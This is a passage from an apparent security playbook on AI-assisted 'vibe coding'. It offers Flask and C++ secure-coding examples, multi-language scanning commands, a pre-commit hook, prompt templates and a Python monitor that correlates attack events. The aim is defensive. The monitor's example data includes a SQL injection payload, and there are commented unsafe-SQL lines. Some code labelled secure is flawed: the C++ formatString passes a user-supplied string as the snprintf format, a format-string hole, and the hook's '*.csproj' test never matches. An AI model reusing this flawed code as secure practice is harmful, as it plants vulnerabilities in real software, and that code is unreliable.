return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
# REQUIRED: Hash passwords with salt
password_hash = generate_password_hash(
validated_data['password'],
method='pbkdf2:sha256',
salt_length=16
)
try:
validated_data.pop('password')  # never persist the plaintext password
user = User(**validated_data)
user.password_hash = password_hash
db.session.add(user)
db.session.commit()
return jsonify({'success': True, 'user_id': user.id}), 201
except Exception as e:
db.session.rollback()
logger.error(f'User creation failed: {e}')
return jsonify({'error': 'User creation failed'}), 500
# REQUIRED: SQLAlchemy ORM with parameterized queries
from sqlalchemy import text
class UserRepository:
def __init__(self, db):
self.db = db
def find_user_by_email(self, email):
# CORRECT: Parameterized query
return User.query.filter_by(email=email, is_active=True).first()
def get_users_by_department(self, dept_id, limit=10):
# CORRECT: Use text() with bound parameters for raw SQL
query = text("""
SELECT u.* FROM users u
WHERE u.department_id = :dept_id
AND u.is_active = true
LIMIT :limit
""")
return self.db.session.execute(
query,
{'dept_id': dept_id, 'limit': limit}
).fetchall()
# FORBIDDEN: Never use string formatting in SQL
# BAD: f"SELECT * FROM users WHERE id = {user_id}"
# BAD: "SELECT * FROM users WHERE name = '%s'" % username
// REQUIRED: Modern C++ with safe string operations
#include <string>
#include <vector>
#include <memory>
#include <algorithm>
#include <stdexcept>
#include <cstdio>   // std::snprintf, std::fopen, std::fclose
#include <cctype>   // std::isalnum
class SecureStringProcessor {
private:
static constexpr size_t MAX_INPUT_SIZE = 1024;
static constexpr size_t BUFFER_SIZE = 2048;
public:
// REQUIRED: Use std::string instead of char arrays
std::string processInput(const std::string& input) {
if (input.empty() || input.size() > MAX_INPUT_SIZE) {
throw std::invalid_argument("Input size validation failed");
}
// REQUIRED: Input sanitization
std::string sanitized;
sanitized.reserve(input.size());
for (char c : input) {
if (std::isalnum(static_cast<unsigned char>(c)) || c == ' ' || c == '-' || c == '_') {
sanitized += c;
}
}
return sanitized;
}
// REQUIRED: Safe buffer operations with bounds checking
std::unique_ptr<std::vector<char>> createSecureBuffer(size_t requested_size) {
if (requested_size > BUFFER_SIZE) {
throw std::invalid_argument("Requested buffer size exceeds maximum");
}
auto buffer = std::make_unique<std::vector<char>>(requested_size);
std::fill(buffer->begin(), buffer->end(), '\0');
return buffer;
}
// REQUIRED: Safe string formatting
std::string formatString(const std::string& format, const std::string& data) {
if (format.size() > 100 || data.size() > 500) {
throw std::invalid_argument("Format string or data too long");
}
// Use safe formatting functions
char buffer[1024];
int result = std::snprintf(buffer, sizeof(buffer), format.c_str(), data.c_str());
if (result < 0 || result >= static_cast<int>(sizeof(buffer))) {
throw std::runtime_error("String formatting failed or truncated");
}
return std::string(buffer);
}
};
// FORBIDDEN: Never use these unsafe functions
// BAD: strcpy, strcat, sprintf, gets, scanf
// GOOD: Use std::string, snprintf, fgets, std::cin.getline
// REQUIRED: RAII and smart pointers
class SecureResourceManager {
private:
static constexpr size_t MAX_BUFFER_SIZE = 4096; // assumed upper bound for allocations
std::unique_ptr<char[]> buffer_;
std::shared_ptr<FILE> file_;
public:
SecureResourceManager(size_t buffer_size) {
if (buffer_size > 0 && buffer_size <= MAX_BUFFER_SIZE) {
buffer_ = std::make_unique<char[]>(buffer_size);
} else {
throw std::invalid_argument("Invalid buffer size");
}
}
bool openFile(const std::string& filename) {
// REQUIRED: Validate file path
if (!isValidFilePath(filename)) {
return false;
}
FILE* raw_file = std::fopen(filename.c_str(), "r");
if (raw_file) {
file_ = std::shared_ptr<FILE>(raw_file, std::fclose);
return true;
}
return false;
}
private:
bool isValidFilePath(const std::string& path) {
// Check for path traversal attempts
return path.find("..") == std::string::npos &&
path.find("//") == std::string::npos &&
path.size() < 260; // Windows MAX_PATH
}
};
// REQUIRED: Always use RAII, never manual memory management
// BAD: char* buffer = malloc(size); // Don't forget free()!
// GOOD: auto buffer = std::make_unique<char[]>(size);
```

### Automated Security Validation Commands
```bash
# Run security-focused tests
dotnet test --filter "Category=Security" --logger "console;verbosity=detailed"
# Static security analysis with multiple tools
dotnet sonarscanner begin /k:"project-security" /d:sonar.cs.roslyn.ignoreIssues=false
dotnet build --configuration Release
dotnet sonarscanner end
# Dependency vulnerability scanning
dotnet list package --vulnerable --include-transitive --format json > vulnerabilities.json
# Code quality with security focus
dotnet format --verify-no-changes
dotnet build -p:TreatWarningsAsErrors=true -p:WarningsAsErrors=""
# Comprehensive security testing
mvn test -Dtest="**/*SecurityTest,**/*IT" -Dmaven.test.failure.ignore=false
# OWASP dependency check with detailed reporting
mvn org.owasp:dependency-check-maven:check -Dformat=ALL -DsuppressionFile=suppressions.xml
# Static analysis with security rules
mvn sonar:sonar -Dsonar.projectKey=secure-java-app \
-Dsonar.java.checkstyle.reportPaths=target/checkstyle-result.xml \
-Dsonar.coverage.jacoco.xmlReportPaths=target/site/jacoco/jacoco.xml
# SpotBugs security analysis
mvn com.github.spotbugs:spotbugs-maven-plugin:check -Dspotbugs.includeFilterFile=security-rules.xml
# Comprehensive security audit
npm audit --audit-level moderate --json > audit-report.json
# Security-focused linting
npx eslint --ext .js,.ts --config .eslintrc-security.js src/ --format json --output-file eslint-security.json
# Dependency security check with Snyk
npx snyk test --severity-threshold=medium --json > snyk-report.json
# Bundle security analysis
npx webpack-bundle-analyzer build/static/js/*.js --mode=static --report=bundle-security.html
# Security vulnerability scanning
bandit -r . -ll -f json -o bandit-security-report.json -x tests/
# Dependency security audit
pip-audit --desc --format=json --output=pip-audit-report.json
# Code quality with security plugins
pylint --load-plugins=pylint_security,pylint_django src/ --output-format=json > pylint-security.json
# Static type checking for security
mypy src/ --strict --show-error-codes --junit-xml=mypy-security.xml
# Static analysis with security focus
clang-tidy --checks='-*,security-*,cert-*,misc-*,readability-*' \
--header-filter='.*' src/ -- -std=c++17 > clang-tidy-security.txt
# Memory safety analysis
valgrind --tool=memcheck --leak-check=full --show-leak-kinds=all \
--track-origins=yes --verbose ./your-app > valgrind-report.txt
# Address sanitizer compilation
g++ -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer \
-g -O1 src/main.cpp -o secure-app
# Static security analysis with PVS-Studio (commercial)
pvs-studio-analyzer trace -- make
pvs-studio-analyzer analyze --output-file security-analysis.log
plog-converter -t fullhtml security-analysis.log -o security-report/
```

### Multi-Stack Pre-Commit Security Hook
```bash
#!/bin/bash
# .git/hooks/pre-commit
# Multi-technology security validation
echo "Running multi-stack security checks..."
# .NET security check
if [ -f "*.csproj" ]; then
dotnet list package --vulnerable --include-transitive
if [ $? -ne 0 ]; then
echo " .NET security vulnerabilities found"
exit 1
fi
fi
# Java security check
if [ -f "pom.xml" ]; then
mvn org.owasp:dependency-check-maven:check -q
if [ $? -ne 0 ]; then
echo " Java security vulnerabilities found"
exit 1
fi
fi
# Node.js security check
if [ -f "package.json" ]; then
npm audit --audit-level moderate
if [ $? -ne 0 ]; then
echo " Node.js security vulnerabilities found"
exit 1
fi
fi
# Python security check
if [ -f "requirements.txt" ]; then
pip-audit --desc
if [ $? -ne 0 ]; then
echo " Python security vulnerabilities found"
exit 1
fi
fi
echo " All security checks passed"
exit 0
```

### Security Scanning Quick Reference

| Technology | Vulnerability Scan | Dependency Audit | Static Analysis | Secret Detection |
|---|---|---|---|---|
| .NET/ASP.NET Core | `dotnet list package --vulnerable` | `dotnet list package --outdated` | `dotnet sonarscanner begin` | `trufflehog --regex .` |
| Java/Spring | `mvn dependency-check:check` | `mvn versions:display-dependency-updates` | `mvn sonar:sonar` | `detect-secrets scan .` |
| JavaScript/Node.js | `npm audit` | `npm outdated` | `eslint --ext .js,.ts src/` | `secretlint "**/*"` |
| Python | `pip-audit` | `pip list --outdated` | `bandit -r .` | `detect-secrets scan .` |
| C/C++ | `conan inspect --vulnerable` | Manual library auditing | `clang-tidy src/` | `grep -r "password\|key" src/` |
```bash
# Run security-focused tests
dotnet test --filter "Category=Security"
# Static analysis with SonarQube
dotnet sonarscanner begin /k:"project-key" /d:sonar.login="token"
dotnet build
dotnet sonarscanner end /d:sonar.login="token"
# Dependency vulnerability check
dotnet list package --vulnerable --include-transitive
# Security-focused code analysis
dotnet format --verify-no-changes
dotnet build -p:TreatWarningsAsErrors=true
# Run security test suite
mvn test -Dtest="*SecurityTest"
# OWASP dependency check
mvn dependency-check:check -Dformat=JSON
# Static analysis
mvn sonar:sonar -Dsonar.projectKey=project-key
# Security vulnerability scanning
mvn org.owasp:dependency-check-maven:check
# Audit dependencies
npm audit --audit-level moderate
# Security linting
eslint --ext .js,.ts --config .eslintrc-security.js src/
# Runtime security testing
npm run test:security
# Bundle analysis for security
npm run analyze-bundle --security
# Security vulnerability scan
bandit -r . -f json -o bandit-report.json
# Dependency security check
pip-audit --desc --output json
# Known-vulnerability database check
safety check --json
# Code quality with security focus
pylint --load-plugins=pylint_security src/
# Static analysis with security focus
clang-tidy --checks='-*,security-*,cert-*' src/
# Memory safety analysis
valgrind --tool=memcheck --leak-check=full ./app
# Address sanitizer build
gcc -fsanitize=address -fno-omit-frame-pointer src/main.c
# Security-focused compilation
gcc -D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wformat-security src/
# Cross-platform security monitoring setup
./security-monitor.sh --setup-alerts --technologies=dotnet,java,nodejs,python,cpp
# Real-time vulnerability monitoring
watch -n 300 './scan-all-dependencies.sh'
# Security event correlation
./correlate-security-events.sh --time-window=1h --threshold=5
# Automated security reporting
./generate-security-report.sh --format=json --include-remediation
```

### Security-Aware Prompt Engineering Template
```
Generate secure [TECHNOLOGY] code for [SPECIFIC_FUNCTION] that:
SECURITY CONTEXT:
- Data Classification: [PUBLIC/INTERNAL/CONFIDENTIAL/RESTRICTED]
- Threat Level: [LOW/MEDIUM/HIGH/CRITICAL]
- Compliance Requirements: [PCI DSS/HIPAA/SOX/GDPR]
REQUIRED SECURITY CONTROLS:
- Authentication: [METHOD AND STRENGTH]
- Authorization: [RBAC/ABAC/POLICY-BASED]
- Input Validation: [ALLOWLIST/SCHEMA-BASED/REGEX]
- Output Encoding: [CONTEXT-SPECIFIC ENCODING]
VULNERABILITY PREVENTION:
- Primary CWE Concerns: [LIST TOP 3 CWEs FOR CONTEXT]
- Security Libraries: [SPECIFY REQUIRED SECURITY FRAMEWORKS]
- Logging Requirements: [SECURITY EVENT LOGGING LEVEL]
Generate production-ready code with inline security comments explaining each control.
```
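For illustration, here is one hypothetical way the template could be filled in for a Python file-upload endpoint; every value below is an example, not a requirement:

```
Generate secure Python code for a Flask file-upload endpoint that:

SECURITY CONTEXT:
- Data Classification: CONFIDENTIAL
- Threat Level: HIGH
- Compliance Requirements: GDPR

REQUIRED SECURITY CONTROLS:
- Authentication: OAuth2 bearer tokens validated on every request
- Authorization: RBAC, "uploader" role required
- Input Validation: Allowlist of file extensions and MIME types, size limit
- Output Encoding: JSON responses only, no reflected user input

VULNERABILITY PREVENTION:
- Primary CWE Concerns: CWE-434, CWE-22, CWE-400
- Security Libraries: Flask-Login, marshmallow, werkzeug secure_filename
- Logging Requirements: Log rejected uploads with source IP and user ID

Generate production-ready code with inline security comments explaining each control.
```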
**.NET Enhancement Prompt:**
```
Generate ASP.NET Core code that implements OWASP ASVS Level 2 controls:
- Apply [Authorize] with specific policies, not just roles
- Use IAuthorizationService for complex authorization logic
- Implement comprehensive input validation with custom ValidationAttributes
- Store secrets in Azure Key Vault with proper key rotation
- Use Entity Framework with explicit SQL injection protection
- Include security headers configuration and anti-forgery tokens
```

**Java/Spring Enhancement Prompt:**
```
Generate Spring Boot code following OWASP Java security guidelines:
- Implement method-level security with @PreAuthorize expressions
- Use Spring Security OAuth2 with proper JWT validation
- Apply Bean Validation with custom constraints for business rules
- Configure Spring Data JPA with audit logging and row-level security
- Implement CORS with environment-specific origin configuration
- Include comprehensive exception handling with security event logging
```

### Multi-Technology Security Validation Pipeline
```bash
#!/bin/bash
# Multi-technology security validation pipeline
# Phase 1: Static Analysis Security Gates
run_sast_analysis() {
echo "Running multi-technology static analysis..."
# .NET Security Analysis
dotnet sonarscanner begin /k:"$PROJECT_KEY" /d:sonar.cs.roslyn.ignoreIssues=false
dotnet build
dotnet sonarscanner end
# Java Security Analysis
mvn sonar:sonar -Dsonar.projectKey=$PROJECT_KEY
mvn org.owasp:dependency-check-maven:check
# Node.js Security Analysis
npm audit --audit-level moderate
npx eslint --ext .js,.ts --config .eslintrc-security.js src/
# Python Security Analysis
bandit -r . -ll -f json -o security-report.json
pip-audit --desc --format=json
# C++ Security Analysis
clang-tidy --checks='-*,security-*,cert-*,readability-*' src/
}
# Phase 2: Dependency Security Validation
validate_dependencies() {
echo "Validating dependency security across all technologies..."
# Create unified vulnerability report
./create-unified-vuln-report.sh \
--dotnet $(dotnet list package --vulnerable --format json) \
--java $(mvn dependency-check:check -Dformat=JSON) \
--nodejs $(npm audit --json) \
--python $(pip-audit --format=json) \
--cpp $(./scan-cpp-deps.sh --format=json)
}
# Phase 3: Security Configuration Validation
validate_security_config() {
echo "Validating security configuration across technology stacks..."
# Verify AI assistant security rules are in place
check_ai_rules() {
[[ -f .cursorrules ]] || echo "Missing Cursor security rules"
[[ -f .cline/rules ]] || echo "Missing Cline security rules"
[[ -f CLAUDE.md ]] || echo "Missing Claude security rules"
[[ -f .github/copilot-instructions.md ]] || echo "Missing Copilot security instructions"
}
check_ai_rules
# Validate technology-specific security configurations
validate_dotnet_security_config
validate_java_security_config
validate_nodejs_security_config
validate_python_security_config
validate_cpp_security_config
}
# Phase 4: Runtime Security Validation
validate_runtime_security() {
echo "Performing runtime security validation..."
# Security-focused integration tests
dotnet test --filter "Category=SecurityIntegration"
mvn test -Dtest="*SecurityIT"
npm run test:security:integration
pytest -m security_integration
./run-cpp-security-tests.sh
}
# Main execution
main() {
run_sast_analysis
validate_dependencies
validate_security_config
validate_runtime_security
# Generate unified security report
./generate-security-dashboard.sh --all-technologies
}
main "$@"
51 / 55
# Security event correlation system for vibe-coded applications
import json
import logging
from datetime import datetime, timedelta
from dataclasses import dataclass
from typing import List, Dict, Optional
from enum import Enum
class SecurityEventType(Enum):
AUTHENTICATION_FAILURE = "auth_failure"
AUTHORIZATION_BYPASS = "authz_bypass"
INPUT_VALIDATION_FAILURE = "input_validation"
SQL_INJECTION_ATTEMPT = "sql_injection"
COMMAND_INJECTION_ATTEMPT = "command_injection"
DESERIALIZATION_ATTACK = "deserialization_attack"
BUFFER_OVERFLOW_ATTEMPT = "buffer_overflow"
@dataclass
class SecurityEvent:
timestamp: datetime
technology_stack: str
event_type: SecurityEventType
source_ip: str
user_id: Optional[str]
details: Dict
risk_score: int
class MultiStackSecurityMonitor:
def __init__(self):
self.events: List[SecurityEvent] = []
self.risk_threshold = 75
def process_dotnet_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process .NET Core security events"""
if "Authorization failed" in log_entry.get('message', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='.NET Core',
event_type=SecurityEventType.AUTHORIZATION_BYPASS,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'endpoint': log_entry.get('endpoint'), 'action': log_entry.get('action')},
risk_score=60
)
return None
def process_java_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process Java/Spring security events"""
if "SQL syntax error" in log_entry.get('message', '') and "'" in log_entry.get('query', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='Java/Spring',
event_type=SecurityEventType.SQL_INJECTION_ATTEMPT,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'query': log_entry.get('query'), 'parameters': log_entry.get('parameters')},
risk_score=85
)
return None
def process_nodejs_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process Node.js security events"""
if "child_process" in log_entry.get('message', '') and "exec" in log_entry.get('stack_trace', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='Node.js',
event_type=SecurityEventType.COMMAND_INJECTION_ATTEMPT,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'command': log_entry.get('command'), 'arguments': log_entry.get('arguments')},
risk_score=90
)
return None
def correlate_attack_pattern(self, time_window: timedelta = timedelta(minutes=10)) -> List[Dict]:
"""Correlate security events to identify coordinated attacks"""
current_time = datetime.now()
recent_events = [
event for event in self.events
if current_time - event.timestamp <= time_window
]
# Group events by source IP
ip_events = {}
for event in recent_events:
if event.source_ip not in ip_events:
ip_events[event.source_ip] = []
ip_events[event.source_ip].append(event)
# Identify coordinated multi-stack attacks
coordinated_attacks = []
for source_ip, events in ip_events.items():
if len(events) >= 3: # Multiple events from same IP
tech_stacks = set(event.technology_stack for event in events)
if len(tech_stacks) >= 2: # Across multiple technologies
total_risk = sum(event.risk_score for event in events)
coordinated_attacks.append({
'source_ip': source_ip,
'technology_stacks': list(tech_stacks),
'total_events': len(events),
'total_risk_score': total_risk,
'attack_pattern': self._identify_attack_pattern(events)
})
return coordinated_attacks
def _identify_attack_pattern(self, events: List[SecurityEvent]) -> str:
"""Identify specific attack patterns based on event sequence"""
event_types = [event.event_type for event in events]
if (SecurityEventType.AUTHENTICATION_FAILURE in event_types and
SecurityEventType.AUTHORIZATION_BYPASS in event_types):
return "Privilege Escalation Attack"
if (SecurityEventType.SQL_INJECTION_ATTEMPT in event_types and
SecurityEventType.COMMAND_INJECTION_ATTEMPT in event_types):
return "Multi-Vector Injection Attack"
if len(set(event.technology_stack for event in events)) >= 3:
return "Cross-Technology Stack Attack"
return "Coordinated Attack"
def generate_security_alert(self, attack_info: Dict) -> Dict:
"""Generate comprehensive security alert for coordinated attacks"""
return {
'alert_id': f"SEC-{datetime.now().strftime('%Y%m%d-%H%M%S')}",
'timestamp': datetime.now().isoformat(),
'severity': 'CRITICAL' if attack_info['total_risk_score'] > 200 else 'HIGH',
'attack_pattern': attack_info['attack_pattern'],
'source_ip': attack_info['source_ip'],
'affected_technologies': attack_info['technology_stacks'],
'total_events': attack_info['total_events'],
'risk_score': attack_info['total_risk_score'],
'recommended_actions': [
f"Block source IP: {attack_info['source_ip']}",
"Review and strengthen authentication mechanisms",
"Audit AI-generated code in affected technology stacks",
"Implement additional input validation",
"Increase monitoring for similar attack patterns"
],
'remediation_priority': 'IMMEDIATE' if attack_info['total_risk_score'] > 250 else 'HIGH'
}
# Usage example
monitor = MultiStackSecurityMonitor()
# Process security events from different technology stacks
dotnet_event = {
'timestamp': '2024-01-15T10:30:00',
'message': 'Authorization failed for user admin_user',
'source_ip': '192.168.1.100',
'endpoint': '/api/admin/users'
}
java_event = {
'timestamp': '2024-01-15T10:32:00',
'message': "SQL syntax error near '' OR '1'='1",
'source_ip': '192.168.1.100',
'query': "SELECT * FROM users WHERE username='admin' OR '1'='1'"
}
# Process and correlate events
security_event_1 = monitor.process_dotnet_security_event(dotnet_event)
security_event_2 = monitor.process_java_security_event(java_event)
if security_event_1:
monitor.events.append(security_event_1)
if security_event_2:
monitor.events.append(security_event_2)
# Detect coordinated attacks
coordinated_attacks = monitor.correlate_attack_pattern()
for attack in coordinated_attacks:
alert = monitor.generate_security_alert(attack)
print(f"SECURITY ALERT: {json.dumps(alert, indent=2)}")
Vibe coding represents a fundamental shift in how software is developed, bringing both unprecedented productivity gains and novel
security challenges. The evidence is clear: improperly governed vibe coding creates systematic vulnerabilities that span multiple
technology stacks and amplify traditional security risks.
However, the VelociPay case study demonstrates that with proper security controls, organizations can harness AI assistance while maintaining
enterprise-grade security. The key is proactive security integration rather than reactive patching.
Success requires a multi-faceted approach:
1. AI Assistant Configuration: Deploy technology-specific security rules files across all development environments
2. Developer Education: Train teams on security-aware prompt engineering and AI-assisted secure coding practices
3. Automated Validation: Implement comprehensive multi-stack security scanning integrated into development workflows
4. Continuous Monitoring: Deploy security event correlation systems that detect cross-technology attack patterns
5. Cultural Integration: Establish security as an enabler of development velocity, not an impediment
- Immediately deploy AI assistant security rules files for your technology stacks
- Establish mandatory security review processes for AI-generated code
- Implement automated security scanning in your development pipeline
- Train developers on secure prompt engineering techniques
- Assess current vibe coding practices and identify vulnerability patterns
- Deploy multi-technology security monitoring and correlation systems
- Develop security requirements and policies specific to AI-assisted development
- Collaborate with development teams to integrate security into vibe coding workflows
- Invest in security-aware vibe coding training and tooling
- Establish clear policies and accountability for AI-generated code security
- Measure security metrics specific to AI-assisted development practices
- Plan for the long-term evolution of secure development practices
The future belongs to teams that master secure vibe coding. By adopting the frameworks, tools, and practices outlined in this playbook,
organizations can maintain the velocity benefits of AI-assisted development while building robust security into their applications from the ground up.
Vibe coding is not inherently insecure—ungoverned vibe coding is. With deliberate security integration, AI-assisted development becomes a
competitive advantage rather than a vulnerability multiplier.